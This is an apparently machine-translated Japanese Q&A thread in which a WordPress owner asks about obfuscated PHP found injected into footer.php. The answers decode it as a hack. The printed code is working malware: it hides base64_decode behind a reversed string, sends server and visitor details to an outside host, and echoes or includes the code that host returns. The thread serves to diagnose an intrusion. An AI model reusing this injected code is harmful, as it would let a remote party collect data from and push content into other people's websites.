WPサイトのfooter.phpにこのUnknown Codesが表示されます。このハッキングは

Question

私のWPサイトのfooter.phpにはこのUnknown Codesが表示されていますか？

<?php 
$cf=strrev('edo'.'ced'.'_46esab');$counter=$cf('aHR0cDovL3NpdGVzY3VscHRvci5iaXovbC5waHA/aWQ9').md5($_SERVER['SERVER_NAME']); 
$data=array('HTTP_ACCEPT_CHARSET','HTTP_ACCEPT_LANGUAGE','HTTP_HOST','HTTP_REFERER', 
'HTTP_USER_AGENT','HTTP_QUERY_STRING','REMOTE_ADDR','REQUEST_URI','REQUEST_METHOD','SCRIPT_FILENAME'); 
foreach($data as $val){$t[]=$_SERVER[$val];}$u=$counter.'&data='.base64_encode(serialize($t));$fn=file_get_contents($u); 
if(!$fn||strlen($fn)<4){ob_start();include($u);$fn=ob_get_contents();ob_clean();} 
if($fn&&strlen($fn)>4){list($crc,$enc)=explode('::',$fn);if(md5($enc)==$crc){echo $cf($enc);}} 
?> 

これは何ですか？A：これは、いくつかのいずれかが私のワードプレスのサイトfooter.phpにこのコードを注入した

をハッキングされましたか

Answer 1

はい。これは既知のハッキングの試みのようです。セキュリティ保護されていないプラグインを削除し、WPのセキュリティソリューションをダウンロードすることで、ブログをすぐに削除してからブログを保護する方がよいでしょう。

Answer 2

<?php 
$cf = base64_decode('aHR0cDovL3NpdGVzY3VscHRvci5iaXovbC5waHA/aWQ9'); 
    echo $cf; 
?>  


http://sitesculptor.biz/l.php?id= 

次いで、

md5($_SERVER['SERVER_NAME']); 

Answer 3

カウンタhttp://sitesculptor.biz/l.php?id=にデコードします。コード（URLパラメータに基づいて）はそこからコードスニペットを取得し、それを実行します。

間違いなくハッキングします。

Answer 4

悪意のある可能性があります。サーバーの詳細をすべてURLのhttp://sitesculptor.biz/l.php?id=に送信し、スクリプトにPHPが返されます。